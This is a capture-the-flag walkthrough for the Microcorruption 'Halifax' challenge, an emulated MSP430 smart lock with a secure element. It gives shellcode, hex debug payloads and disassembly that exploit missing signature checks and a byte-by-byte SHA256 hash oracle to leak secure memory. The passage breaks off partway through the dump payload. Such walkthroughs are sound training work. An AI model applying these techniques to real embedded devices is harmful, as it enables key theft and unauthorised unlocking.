Meteorological Opposite of Hell: Secure Element Black Box Firmware Exploitation

James Every
Black Friday, 2023

Abstract

This page is a walkthrough for Halifax, the sixth and final in a recent series of reverse engineering challenges from the embedded systems division at NCC Group.

Executive Summary

Twelve months, two-hundred people, four dozen functioning exploits. This was the first. Here is how to reverse engineer an ABI, black box an enclave, and leak the key in twenty-seven hours or less. Challenges Deployed:
0800 UTC, October 28th, 2022.
First Working Exploit:
1328 UTC, October 31st, 2022.
First Wayback Machine Snapshot:
1751 UTC, October 31st, 2022
Announcement Post:
October 31st, 2022

Overview

First Working Exploit: 1328 UTC, October 31st, 2022
Blockchain Timestamp: 1831 UTC, October 31st, 2022
Pastebin Timestamp: pastebin.com/hKCp5UgH
Cryptographic Proof of Existence: solution.txt solution.txt.ots
Solve Count At Time Of Writing: 45
Solves Per Month: 3.52
Reading Time: 45 minutes

Rendering Note:

There is a known issue with Android lacking a true monotype system font, which breaks many of the extended ASCII character set diagrams below. Please view this page on a Chrome or Firefox-based desktop browser to avoid rendering issues. Ideally on a Linux host.

Background

The following is a walkthrough for the last in the new series of Microcorruption challenges. The original CTF-turned-wargame was developed a decade ago by Matasano and centered around a deliberately vulnerable smart lock. The goal for each challenge was simple: write a software exploit to trigger an unlock.

NCC Group later acquired Matasano. They continued maintaining the wargame and added half a dozen new challenges on October 28^th, 2022, of which this is one.

System Architecture

The emulated device runs on the MSP430 instruction set architecture. It uses a 16-bit little-endian processor and has 64 kilobytes of RAM. The official manual includes the details, but relevant functionality is summarized below.

Interface

Several separate windows control the debugger functionality.

A user input prompt like the following is the device's external communication interface.

Exploit Development Objective

The equivalent of popping a shell on this system is calling interrupt 0x7F. On earlier challenges in the series, there is a dedicated function called unlock_door that does this.

Executing the following shellcode is functionally equivalent to calling the unlock_door function.

Disassembly

3240 00ff      mov     #0xff00, sr
b012 1000      call    #0x10

Assembly

324000ffb0121000

The following message is displayed in the interface when the interrupt is called successfully.

High-Level Analysis

Sample Payload

The debug payload is relatively short, and the load address is read big-endian. The example payload is below.

8000023041

Sample Output

Running the firmware with the example debug payload will produce the following output at the console:

Welcome to the test program loader.
Enabling hardened mode
Verifying 0x7f interrupt disabled
0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt
Internal SRAM Hash:
0865DECED9DEB1245501768025853EA0FE5FAF4D2B7133E2D2F1B8D52ED0588D
Please enter debug payload.
Executing debug payload
Please enter debug payload.

The debug payload is loaded to address 0x8000 and successfully executed.

Manual

The output for the "manual" debugger command contains the following description of the new behavior:

Any payload is allowed, because the unlock key must be passed to the new interrupt with code 0x41, and this key is only stored in secure memory.

Payload Format

The payload format is the same as in Vancouver.

Parsing Format
Load Address	Size (Bytes)	Executable code
`8000`	`02`	`3041 (RET)`

Flow Control Graph

The Ghidra flow control graph for the main function is as follows.

Missing Signature Verification

The absence of apparent calls to ed25519_verify Signature verification on St. Johns, Cold Lake, and Churchill relied on this function. suggests that the debug payload lacks signature verification. This vulnerability can be confirmed by attempting to submit any arbitrary payload. The crafted payload below includes a size field incremented by two and a second return instruction appended to the end of the executable section.

80000430413041

Breaking at address 0x8000 and continuing execution verifies that this payload is successfully loaded into memory and executed.

Inconsistent Internal SRAM Hash

It is worth noting that the "Internal SRAM Hash" seems to change between runs, which is verifiable by using the reset debugger command and continuing execution from the beginning. Below are two different samples.

Run #1

Welcome to the test program loader.
Enabling hardened mode
Verifying 0x7f interrupt disabled
0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt
Internal SRAM Hash:
B786D20726FB0E6E8EB8ECCD92EFFBEDA6875755722ABE2B15A8D1B4541559CF
Please enter debug payload.

Run #2

Welcome to the test program loader.
Enabling hardened mode
Verifying 0x7f interrupt disabled
0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt
Internal SRAM Hash:
74972D7E94276A0BDE1C3046EF81EFB5B079BACDD171CA6B9C1D6B29CCDBFB39
Please enter debug payload.

Sanity Check

The next step is to verify that the unlock interrupt is disabled, accomplished using the following payload.

Shellcode

800008324000ffb0121000

Payload Structure
Load Address	Size (Bytes)	Executable code
`8000`	`08`	`324000ffb0121000`

Disassembly

3240 00ff      mov       #0xff00, sr
b012 1000      call      #0x10

Breaking at address 0x8000 and single-stepping verifies that the call to address 0x10 happens as usual. However, it returns with no discernible effect, which suggests that the unlock interrupt is disabled.

Reverse Engineering Methodology

Similar Systems

Anyone familiar with the original challenge set will remember that some involved bypassing hardware security modules (HSMs). Detailed writeups for the exploits used to bypass these HSMs already exist elsewhere, but it is worth briefly summarizing how they work because this system may be similar. For this section, emphasis is added unless otherwise noted.

HSM Model 1

3.2 HSM Model 1
The Model 1 of the hardware security module contains a simple interface which allows the MCU to test if an entered password is valid. By default, the interrupt 0x7D will pass a given password to the HSM, and will set a byte in memory if the password entered matches the stored password.
— Microcorruption Manual

Case Study

The Hanoi firmware version employs the HSM Model 1.

The LockIT Pro can send the LockIT Pro HSM-1 a password, and the HSM will return if the password is correct by setting a flag in memory. This [hardware version contains] two available ports: the LockIT Pro Deadbolt should be connected to port 1, and the LockIT Pro HSM-1 should be connected to port 2.
— Hanoi Level Manual

This external device prevents attackers from extracting passwords by dumping the program strings. It takes a pointer to the user-supplied password and returns a boolean indicating whether the supplied credential is correct.

There is code on the MCU that is responsible for checking this boolean and triggering the unlock interrupt if the HSM sets it to true. Exploitation involves a logical buffer overflow to overwrite it and make the conditional check pass.

HSM Model 2

3.3 HSM Model 2
The Model 2 of the hardware security module is a more advanced HSM, with the ability to directly trigger the unlock functionality in the lock. The MCU passes the lock a password, and the HSM will trigger the unlock if the password is valid. By default, the interrupt 0x7E will pass a given password to the HSM, and the lock will be opened if the password entered matches the stored password.
— Microcorruption Manual

Case Study

The Whitehorse firmware version employs the HSM Model 2.

The LockIT Pro can send the LockIT Pro HSM-2 a password, and the HSM will directly send the correct unlock message to the LockIT Pro Deadbolt if the password is correct, otherwise no action is taken. This [hardware version contains] two available ports: the LockIT Pro Deadbolt should be connected to port 1, and the LockIT Pro HSM-2 should be connected to port 2. [...] We have removed the function to unlock the door from the LockIT Pro firmware.
— Whitehorse Level Manual

This description is misleading because it implies that the unlock interrupt is blocked at a hardware level (i.e., only the HSM has deadbolt unlock capabilities), potentially leading an attacker into believing they have to perform black-box analysis against the HSM. In reality, it is possible to exploit a stack overflow and inject malicious code to trigger the unlock interrupt from the MCU.

The Canadian Connection

The disassembly and the status messages indicate that interfacing with external hardware likely requires interrupts 0x40 and 0x41—much like 0x7D and 0x7E from the original challenge set.

Halifax is effectively a next-gen version of Whitehorse. The latter is insecure because it does not block the unlock interrupt at a hardware level, whereas the former might. A successful attack will likely involve a more advanced variation on the process used to exploit the older revision.

Hardware Architecture

Vancouver

The original hardware design, used in Vancouver and most of the previous versions, resembles the following diagram:

The deadbolt is assumed to be an electromechanical device that performs some physical action when supplied with power. Control over this action is equivalent to owning the system. Successfully triggering the unlock interrupt from software most likely causes the processor to pull a GPIO pin high, thus supplying power to the deadbolt and causing it to retract.

Hanoi

Hanoi was the first device version to employ an HSM, relying on it as a secure credential store. Based on the level manual, the hardware architecture resembles the following diagram.

Communications between the MCU and HSM occur over a serial line (or similar). This version of the HSM has no way to trigger the unlock directly, relying instead on the MCU to implement that logic. The hardware architecture of this system is flawed because an attacker with arbitrary code execution on the MCU can ignore the HSM.

Whitehorse

In addition to serving as a secure credential store, the Model 2 HSM can trigger the unlock directly—although this does not prevent the MCU from doing so. Based on the level manual, the hardware architecture resembles the following diagram.

The flaw in the above design is that there is no redundancy. An attacker only needs to exploit one processor to supply power to the deadbolt and can safely ignore the other chip.

This design would require a simple modification to fix: disconnect the MCU from the deadbolt, requiring an attacker to compromise the HSM.

Halifax

Even with the MCU disconnected from the deadbolt, the HSM is still a single point of failure. A better architecture might require consensus among multiple cores before an unlock can be triggered, requiring attackers to compromise the MCU and the HSM in sequence. Preventing an attacker who compromises a single processor from owning the entire system could be accomplished with a hardware architecture resembling the following diagram.

The transistor is assumed to be an AND logic gate, meaning that power physically cannot be supplied to the deadbolt unless the MCU and the HSM pull their bottom pins high. The code on the MCU communicates with the HSM over serial (or similar), authenticates in some capacity, and the HSM pulls its pin high if the authentication is successful. The MCU can then pull its pin high to trigger the unlock.

Attack Surface

There are two different approaches for developing a working attack against this system.

Assume there is no transistor. The unlock interrupt is disabled in software on the MCU, which implies that it might be possible to write shellcode that re-enables it before making the interrupt call.
Assume there is a transistor. The unlock interrupt is disabled at a physics level, requiring exploitation of the HSM to manipulate it into pulling its pin high.

The former mechanism effectively relies on security through obscurity to prevent an attacker from re-enabling the interrupt, which makes it the lower-hanging fruit and the logical next target for analysis. The latter would effectively require black-box analysis of the interface to an undocumented security processor.

Re-Enabling Interrupts From Software

The first approach requires reviewing the documentation for this system and its underlying hardware. The manual PDF supplied with the system does not mention the new functionality, so it is impossible to tell what purpose interrupts 0x40 and 0x41 serve.

The EINT And DINT Instructions

Initial internet searches turn up a salient artifact: one of the manuals for the instruction set architecture contains a reference to instructions that are supposed to disable and enable interrupts.

Attempting to assemble either of these instructions using the provided assembler results in an error:

Error assembling:
TypeError: a.split(...)[1] is undefined

Emulated Instructions

The manual has an asterisk next to these instructions, which the legend indicates are "emulated instructions." Another architecture manual contains a more detailed explanation of this functionality.

There are core instructions that are implemented into hardware, and emulated instructions that use the hardware construction and emulate instructions with high efficiency. The emulated instructions use core instructions with the additional built-in constant generators CG1 and CG2.

The following description follows slightly later.

The assembler accepts the mnemonic of the emulated instruction, and inserts the opcode of the suitable core instruction.

The following table (taken from the same manual) shows the relationship between emulated instructions and core instructions.

The third and fourth lines from the bottom indicate the core instructions equivalent to the emulated DINT and EINT instructions.

Emulated instruction equivalents for disabling/enabling interrupts
Emulated Instruction	Core Instruction
`DINT`	`BIC #8,SR`
`EINT`	`BIS #8,SR`

The naive approach is attempting to globally disable and re-enable all interrupts in the hope of re-enabling the blocked one. A simple test of this functionality would entail calling DINT followed by EINT, but there is one caveat to this approach: according to this forum post, a few NOP instructions must follow DINT because it takes multiple cycles to take effect.

Working Around Broken Assemblers

The built-in assembler does not work consistently, so the one from the MSProbe project is used to generate the executable code for the payload section containing the DINT and EINT instructions. This assembler correctly interprets the emulated instructions.

Test Payload

80001c32c2034303430343034332d20343034303430343324000ffb0121000

Payload Structure
Load Address	Size (Bytes)	Executable code
`8000`	`1c`	`32c2 0343 0343 0343 0343 32d2 0343 0343 0343 0343 3240 00ff b012 1000`

Disassembly

32c2           bic	#0x8, sr
0343           clr	4
0343           clr	4
0343           clr	4
0343           clr	4
32d2           bis	#0x8, sr
0343           clr	4
0343           clr	4
0343           clr	4
0343           clr	4
3240 00ff      mov	#0xff00, sr
b012 1000      call	#0x10

Testing the above payload on Vancouver confirms that the unlock is triggered, but this does not work on Halifax. The call to 0x10 once again returns without visible effect. With the possibility of re-enabling the interrupt from software eliminated, the only remaining option is black-box analysis of the interface to the secure processor.

Black Box Analysis

The first step is understanding the code that makes interrupt calls to the secure processor interface, which requires a more detailed review of the disassembly and flow control for the main function. Assume that the logical AND transistor is present moving forward.

Static Analysis

Consider the flow control graph from earlier again.

Flow Control Graph

Observing the string printed by each conditional block allows the deduction of its purpose.

Status Messages

Defined Strings
String Address	String	Address of Conditional Block Containing Referencing Code
4634	"Welcome to the test program loader."	443e
4658	"Enabling hardened mode"	443e
466f	"Verifying 0x7f interrupt disabled"	443e
4691	"0x7f interrupt disabled, key stored in internal SRAM"	443e
46c6	"unlock by providing the 16 byte key to 0x41 interrupt"	443e
46fc	"Internal SRAM Hash:"	443e
4710	"0123456789ABCDEF"	44ac
4722	"Please enter debug payload.	44ee
473e	"Invalid payload length"	4524
4755	"Executing debug payload"	452e

The 0x40 interrupt enables "hardened mode", which disables the unlock interrupt. The standard portable shellcode has no discernible effect when executed after this call.

444a:  mov	#0x4658 "Enabling hardened mode", r15
444e:  call	#0x4586 <puts>
4452:  push	#0x0
4454:  push	#0x0
4456:  push	#0x40
445a:  call	#0x4550 <INT>

The firmware behavior confirms this, as it subsequently attempts to call the unlock interrupt to ensure it is disabled.

4462:  mov	#0x466f "Verifying 0x7f interrupt disabled", r15
4466:  call	#0x4586 <puts>
446a:  push	#0x0
446c:  push	#0x0
446e:  push	#0x7f
4472:  call	#0x4550 <INT>

This check is followed in turn by two puts calls to print the following status messages:

0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt

Implementation Conjecture

Based on the above analysis, a few tentative theories emerge.

The 0x40 interrupt causes the secure processor to pull its GPIO pin low, causing the logical AND gate to turn off and thus physically preventing unlock interrupts triggered from the MCU from retracting the deadbolt.
Turning the secure processor's GPIO pin back on requires sending a 16-byte key over the serial line.
The 16-byte key resides in "SRAM", ostensibly standing for "secure RAM" and referring to the internal memory of the secure processor.
The key must be passed to the secure processor through interrupt 0x41, using an undocumented calling convention.

The fact that the SRAM hash changes between runs suggests that the content of SRAM also changes. It is impossible to rule out random key generation or mutation during the initial 0x40 interrupt call.

Hardware Security Background

While it has been convenient to refer to the external hardware as an "HSM" or "secure processor" up to this point, it is worth noting that it could be one of multiple similar things. These hardware security devices fall into four broad categories.

Hardware Security Modules (HSMs)
Trusted Platform Modules (TPMs)
Secure Enclaves or Trusted Execution Environments (TEEs)
Secure Elements (SEs)

WolfSSL has a page summarizing the differences.

It is possible to execute custom code inside TEEs, but this is not true of the other three categories—which usually only run code written by their respective vendors. The lack of boutique code theoretically means that fixing vulnerabilities in secure elements, HSMs, and TPMs is the vendor's responsibility—and it can imply that these chips have undergone more intense security testing. Of course, this claim is speculative, as it is impossible to determine how much review or testing any proprietary codebase has undergone.

One concern is the degree to which the device is Turing complete. Some of these devices could theoretically implement operations using varying amounts of analog logic, which means that exploitation in the traditional sense may not be possible because there is no software on the device to exploit.

Theoretical Attacks

There are a few possible attacks to consider.

Arbitrary code execution on the secure processor.
Authentication bypass due to a logic flaw.
Leaking the key from SRAM.

Arbitrary code execution may not be possible, and attempting to bypass authentication or fuzz the interface would be convoluted without an example of how to communicate with the device.

The compiled code for the implementation may reside in SRAM. Even if it is impossible to extract the key, acquiring an image of the running firmware for further analysis might still be possible. One way or another, an information leak is likely required.

Hunting For Information Leaks

SRAM Hash Calculation

The obvious target for a memory leak is functionality that already reads data from secure memory. The SRAM hash calculation is a likely candidate.

The sha256_internal function wraps an 0x41 interrupt call, which implies that the interrupt used to pass the unlock key is the same one used to compute the SRAM hash.

45b6 <sha256_internal>
45b6:  0d12           push	r13
45b8:  0e12           push	r14
45ba:  0f12           push	r15
45bc:  3012 4100      push	#0x41
45c0:  b012 5045      call	#0x4550 <INT>
45c4:  3152           add	#0x8, sp
45c6:  3041           ret

The setup for that function call is as follows.

The value in R13 is a stack pointer—likely the location where the function returns the computed checksum. Observing stack memory before and after the call confirms this theory.

┌───────────────────────────────────────────────┐
│                     STACK                     │
├───────┬───────────────────────────────────────┤
│ADDRESS│                 DATA                  │
├───────┼───────────────────────────────────────┤
│  43d0 │6445 0100 8245 0000 0a00 a045 0000 9e44│
├───────┼───────────────────────────────────────┤  ┌───┬───────────────┐
│  43e0 │0000 0000 0000 0000 0000 0000 0000 0000│◄─┤R13│CHECKSUM BUFFER│
├───────┼───────────────────────────────────────┤  └───┴───────────────┘
│  43f0 │0000 0000 0000 0000 0000 0000 0000 0000│
└───────┴───────────────────┬───────────────────┘
                            │
                            ▼ CALL
                    ┌───────────────┐
                    │sha256_internal│
                    └───────┬───────┘
                            │
                            ▼ RETURN
┌───────┬───────────────────────────────────────┐
│  43d0 │6445 0000 c445 4100 0000 0010 e043 aa44│
├───────┼───────────────────────────────────────┤  ┌───┬───────────────┐
│  43e0 │c2a1 46c0 e5dc c4db e06c 413d a787 2f06│◄─┤R13│CHECKSUM BUFFER│
├───────┼───────────────────────────────────────┤  └───┴───────────────┘
│  43f0 │ac82 ff94 28f2 d00d 4326 1514 6748 1df2│
└───────┴───────────────────────────────────────┘

The 32-byte value beginning at address 43e0 is the internal SRAM hash, confirmed by the status message printed soon afterward.

Internal SRAM Hash:
C2A146C0E5DCC4DBE06C413DA7872F06AC82FF9428F2D00D4326151467481DF2

Calling Convention

The purpose of the values passed in R14 and R15 is not immediately apparent.

pc  45c0  sp 43d6  sr 0000  cg 0000
r04 0000 r05 5a08 r06 0000 r07 0000 
r08 0000 r09 0000 r10 0000 r11 0000 
r12 4400 r13 43e0 r14 1000 r15 0000

Breaking at address 0x44a6 and manually setting R15 to 0x100 before the call to sha256_internal results in the following error.

This string is not defined anywhere in the program memory and prints to the debugger console rather than the I/O console.

Further permutations:

Setting R15 to 0x1 produces the same error.
Changing R14 to 0x800 and R15 to 0x1 seems to result in normal behavior.

Address Range Data Hashing

If the sha256_internal function is computing a checksum for a fixed-length block of memory at a known offset, it should logically need only one parameter (the address of the stack buffer to write the returned checksum). The fact that there are two more implies that the interrupt hashes a specific section of SRAM. Such functionality would require two more parameters, i.e., a start and end address.

               ┌───┬────┐                    ┌───┬────┐
               │R15│0002│                    │R14│000e│
               └───┼────┘                    └───┼────┘
                   │                             │
                   ▼                             ▼
┌────┬────────┬────┬────┬────┬────┬────┬────┬────┬────┬────┐
│    │CONTENTS│AAAA│BBBB│CCCC│DDDD│EEEE│FFFF│1111│2222│3333│
│SRAM├────────┼────┼────┼────┼────┼────┼────┼────┼────┼────┤
│    │ADDRESS │0000│0002│0004│0006│0008│000a│000c│000e│0010│
└────┴────────┴────┴────┴────┴────┴────┴────┴────┴────┴────┘

The problem with this theory is that it should be impossible to "exceed SRAM length" by setting the lower of the two values slightly higher. That error implies that one is the start offset and the other is the length.

                                             ┌───┬────┐
                                             │R14│000c│
                                             └───┴────┘

               ┌───┬────┐                ┌───────┬────┐
               │R15│0002│                │R15+R14│000e│
               └───┼────┘                └───────┼────┘
                   │                             │
                   ▼                             ▼
┌────┬────────┬────┬────┬────┬────┬────┬────┬────┬────┬────┐
│    │CONTENTS│AAAA│BBBB│CCCC│DDDD│EEEE│FFFF│1111│2222│3333│
│SRAM├────────┼────┼────┼────┼────┼────┼────┼────┼────┼────┤
│    │ADDRESS │0000│0002│0004│0006│0008│000a│000c│000e│0010│
└────┴────────┴────┴────┴────┴────┴────┴────┴────┴────┴────┘

It makes no sense for the length to be zero (the value passed in R15 by main), which implies that R14 is the length and R15 is the start offset. If R14 contains the value 0x1000, that suggests SRAM is either 4096 or 8192 bytes long—depending on whether secure memory is byte or word addressed.

                                                      ┌───┬────┐
                                                      │R14│1000│
                                                      └───┴────┘

          ┌───┬────┐                              ┌───────┬────┐
          │R15│0000│                              │R15+R14│1000│
          └───┼────┘                              └───────┼────┘
              │                                           │
              ▼                                           ▼
┌────┬────────┬────┬────┬────┬────┬───┬────┬────┬────┬────┐
│    │CONTENTS│1111│2222│3333│4444│...│0000│0000│0000│0000│
│SRAM├────────┼────┼────┼────┼────┼───┼────┼────┼────┼────┤
│    │ADDRESS │0000│0002│0004│0006│...│0FFC│0FFD│0FFE│0FFF│
└────┴────────┴────┴────┴────┴────┴───┴────┴────┴────┴────┘

This calling convention implies the existence of an information leak vulnerability: if it is possible to specify any start offset and a length of 0x1, the interrupt should return the SHA256 checksum of a single word—or possibly even a single byte.

                         ┌───┬────┐
                         │R14│0001│
                         └───┴────┘

          ┌───┬────┐ ┌───────┬────┐
          │R15│0000│ │R15+R14│0001│
          └───┼────┘ └───────┼────┘
              │              │
              │              │
              │    ┌─────────┘
              ▼    ▼
┌────┬────────┬────┬────┬────┬────┬────┬───┬────┬────┬────┬────┐
│    │CONTENTS│ 11 │ 11 │2222│3333│4444│...│0000│0000│0000│0000│
│SRAM├────────┼────┼────┼────┼────┼────┼───┼────┼────┼────┼────┤
│    │ADDRESS │0000│0001│0002│0004│0006│...│0FFC│0FFD│0FFE│0FFF│
└────┴────────┴────┴────┴────┴────┴────┴───┴────┴────┴────┴────┘

It is then possible to run all 256 possible individual bytes through sha256 to find which one produced the hash.

Proof Of Concept

Verifying the vulnerability is simple: because any given memory space will generally have many nulls, choosing a random start offset in high memory will likely return the hash of a single null byte. Take a case where R15 is 0x800 and R14 is 0x1.

High Memory Start Offset

                                  ┌───┬────┐
                                  │R14│0001│
                                  └───┴────┘

                   ┌───┬────┐ ┌───────┬────┐
                   │R15│0800│ │R15+R14│0801│
                   └───┼────┘ └───────┼────┘
                       │              │
                       │              │
                       │    ┌─────────┘
                       ▼    ▼
┌────┬────────┬───┬────┬────┬────┬────┬───┐
│    │CONTENTS│...│0000│ 00 │ 00 │0000│...│
│SRAM├────────┼───┼────┼────┼────┼────┼───┤
│    │ADDRESS │...│07FE│0800│0801│0802│...│
└────┴────────┴───┴────┴────┴────┴────┴───┘

Given these parameters, the I/O console will probably print the hash for a single null byte.

Resulting Hash

Internal SRAM Hash:
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D

Known Preimage

A sha256 hash can be calculated in Python using the following code.

python3 -i
>>> import hashlib
>>> import binascii
>>> binascii.hexlify(hashlib.sha256(b'\x00').digest())
b'6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d'

The known hash for a single null byte matches the one printed to the I/O console, confirming that the byte at offset 0x800 in SRAM is 0x00 and that it is possible to checksum individual bytes. The information leak vulnerability exists and is exploitable.

Concerning the workings of hashing algorithms:

It may not be immediately clear why this proves it is possible to leak individual byte values rather than words. To illustrate why this is so, consider the following Python code.

>>> import hashlib
>>> import binascii
>>> binascii.hexlify(hashlib.sha256(b'\x00\x00').digest())
b'96a296d224f285c67bee93c30f8a309157f0daa35dc5b87e410b78630a09cfc7'

Passing a single null byte through a hashing algorithm produces a different output than doing the same with two null bytes. Given an algorithm resistant to collisions (like SHA256), a matching checksum implies that the hashing operation occurs on a single null byte rather than a null word.

Exploit Weaponization

While it is convenient to single-step and manually edit register values to leak individual bytes, a more efficient technique is required to extract the entire contents of SRAM. There is already code to call sha256_internal and print the resulting hash to the I/O console.

Loop that prints the SHA256 hash to the I/O console.

All that is required is some payload code to patch in an unconditional branch in the middle of the main function, then run a loop that sets the values for R13, R14, and R15 and branches to address 0x44a6—just before the call to sha256_internal. This payload code will print the hash for every byte in SRAM.

Functionality Breakdown

The payload would be a while loop if implemented in a higher-level language. The first instruction is responsible for jumping over the data section.

┌──┐  ┌────────────────────┐
│PC├─►│jmp     $+0x32      ├───┐
└──┘  ├────────────────────┤   │
      │                    │   │
      │        DATA        │   │JUMP
      │                    │   │
      ├────────────────────┤   │
      │mov     #0x8002, r4 │◄──┘
      ├────────────────────┤
      │mov     @r4, &0x44ee│        
      ├────────────────────┤
      │incd    r4          │
      ├────────────────────┤
      │mov     @r4, &0x44f0│
      ├────────────────────┤
      │mov     sp, r13     │
      ├────────────────────┤
      │mov     #0x1, r14   │
      ├────────────────────┤
      │mov     &0x8006, r15│
      ├────────────────────┤
      │inc     r15         │
      ├────────────────────┤
      │mov     r15, &0x8006│
      ├────────────────────┤
      │mov     &0x8008, r6 │
      ├────────────────────┤
      │cmp     r6, r15     │
      ├────────────────────┤
      │jz      $+0x6       │
      ├────────────────────┤
      │br      #0x44a6     │
      └────────────────────┘

Following this are two writes to patch in a branch instruction after the end of the loop that prints the SRAM hash. When executed later, this patched opcode causes execution to jump back to the start of the payload.

       ┌────────────────────┐
       │jmp     $+0x32      │
       ├────────────────────┤
       │                    │
       │        DATA        │
       │                    │
       ├────────────────────┤
       │mov     #0x8002, r4 │
┌───┐  ├────────────────────┤PATCH¹
│PC¹├─►│mov     @r4, &0x44ee├──────┐
└───┘  ├────────────────────┤      │
       │incd    r4          │      │
┌───┐  ├────────────────────┤PATCH²│
│PC²├─►│mov     @r4, &0x44f0├──────┤
└───┘  ├────────────────────┤      │WRITES
       │mov     sp, r13     │      │OPCODE
       ├────────────────────┤      ▼
       │mov     #0x1, r14   │ ┌──────────┐
       ├────────────────────┤ │br #0x8000│
       │mov     &0x8006, r15│ └────┬─────┘
       ├────────────────────┤      │TO
       │inc     r15         │      │
       ├────────────────────┤      │
       │mov     r15, &0x8006│      │
       ├────────────────────┤      │
       │mov     &0x8008, r6 │      │
       ├────────────────────┤      │
       │cmp     r6, r15     │      │
       ├────────────────────┤      │
       │jz      $+0x6       │      │
       ├────────────────────┤      │
       │br      #0x44a6     │      │
       └────────────────────┘      │
                                   │
     ┌─────────────────────────────┘
     │
     │ ┌──────────────────────────────────────────────────┐
     │ │and	#0xf, r14                                 │
     │ ├──────────────────────────────────────────────────┤
     │ │mov.b	0x4710(r14), r15                          │
     │ ├──────────────────────────────────────────────────┤
     │ │call    #0x4578 <putchar>                         │
     │ ├──────────────────────────────────────────────────┤
     │ │mov.b   r10, r15                                  │
     │ ├──────────────────────────────────────────────────┤
     │ │call    #0x4578 <putchar>                         │
     │ ├──────────────────────────────────────────────────┤
     │ │inc     r11                                       │
     │ ├──────────────────────────────────────────────────┤
     │ │cmp     #0x20, r11                                │
     │ ├──────────────────────────────────────────────────┤
     │ │jnz     $-0x38 <main+0x6e>                        │
     │ ├──────────────────────────────────────────────────┤
     │ │mov     #0x4721, r15                              │
     │ ├──────────────────────────────────────────────────┤
     │ │call    #0x4586 <puts>                            │
     │ ├──────────────────────────────────────────────────┤
     └►│mov     #0x4722 "Please enter debug payload.", r15│
       ├──────────────────────────────────────────────────┤
       │call    #0x4586 <puts>                            │
       ├──────────────────────────────────────────────────┤
       │mov     #0x400, r13                               │
       ├──────────────────────────────────────────────────┤
       │clr     r14                                       │
       ├──────────────────────────────────────────────────┤
       │mov     #0x2400, r15                              │
       ├──────────────────────────────────────────────────┤
       │call    #0x45c8 <memset>                          │
       └──────────────────────────────────────────────────┘

The parameters for the call to sha256_internal come next.

      ┌────────────────────┐
      │mov     #0x8002, r4 │
      ├────────────────────┤
      │mov     @r4, &0x44ee│
      ├────────────────────┤
      │incd    r4          │
      ├────────────────────┤
      │mov     @r4, &0x44f0│
      ├────────────────────┤
      │mov     sp, r13     │
┌──┐  ├────────────────────┤
│PC├─►│mov     #0x1, r14   │
└──┘  ├────────────────────┤
      │mov     &0x8006, r15│
      ├────────────────────┤
      │inc     r15         │
      ├────────────────────┤
      │mov     r15, &0x8006│
      ├────────────────────┤
      │mov     &0x8008, r6 │
      ├────────────────────┤
      │cmp     r6, r15     │
      ├────────────────────┤
      │jz      $+0x6       │
      ├────────────────────┤
      │br      #0x44a6     │
      └────────────────────┘

The value at 0x8006 is a counter in the data section containing the offset for the byte in SRAM to hash for the current iteration.

       ┌────────────────────┐      ┌──────┐
       │mov     #0x8002, r4 │      │      │
       ├────────────────────┤      │ DATA │
       │mov     @r4, &0x44ee│      │      │
       ├────────────────────┤      ├──────┤
       │incd    r4          │      │ 3040 │
       ├────────────────────┤      ├──────┤      ┌────┐           ┌────┐
       │mov     @r4, &0x44f0│      │ 0080 │      │R15:│           │R15:│
       ├────────────────────┤      ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
       │mov     sp, r13     │    ┌►│ FFFF ├─────►│FFFF├──────────►│0000│
       ├────────────────────┤    │ ├──────┤      └────┘           └─┬──┘
       │mov     #0x1, r14   │    │ │ 0010 │                         │
┌───┐  ├────────────────────┤    │ ├──────┤                         │
│PC¹├─►│mov     &0x8006, r15│    │ │ .... │                         │
├───┤  ├────────────────────┤    │ ├──────┤                         │
│PC²├─►│inc     r15         │    │ │ .... │                         │
├───┤  ├────────────────────┤    │ └──────┘                         │
│PC³├─►│mov     r15, &0x8006│    │               STORE³             │
└───┘  ├────────────────────┤    └──────────────────────────────────┘
       │mov     &0x8008, r6 │
       ├────────────────────┤
       │cmp     r6, r15     │
       ├────────────────────┤
       │jz      $+0x6       │
       ├────────────────────┤
       │br      #0x44a6     │
       └────────────────────┘

The first iteration of this loop will increment the counter variable, causing a deliberate integer overflow that wraps around to address 0x0000. The next instruction updates the word at address 0x8006 with the new value.

This counter will be 0x0001 on the next iteration, then 0x0002, etcetera.

i = 1

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤      ┌────┐           ┌────┐
  │ 0080 │      │R15:│           │R15:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 0000 ├─────►│0000├──────────►│0001│
│ ├──────┤      └────┘           └─┬──┘
│ │ 0010 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

i = 2

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤      ┌────┐           ┌────┐
  │ 0080 │      │R15:│           │R15:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 0001 ├─────►│0001├──────────►│0002│
│ ├──────┤      └────┘           └─┬──┘
│ │ 0010 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

The last item of importance is the termination condition. This loop will run past the end of SRAM and cause the processor to halt with the "Exceeded SRAM length" error. While this is not problematic for this version, it will be necessary to avoid this when extending the payload with more code later.

The SRAM is 4096 bytes long. One of the words in the data section stores this value, and the payload code compares it to the current offset after every iteration. If the current offset is 0x1000, the code deliberately jumps into null memory and crashes the MCU.

       ┌────────────────────┐        ┌──────┐
       │mov     #0x8002, r4 │        │      │
       ├────────────────────┤        │ DATA │
       │mov     @r4, &0x44ee│        │      │
       ├────────────────────┤        ├──────┤
       │incd    r4          │        │ 3040 │
       ├────────────────────┤        ├──────┤
       │mov     @r4, &0x44f0│        │ 0080 │
       ├────────────────────┤        ├──────┤      ┌────┐
       │mov     sp, r13     │        │ FFFF │      │R6: │
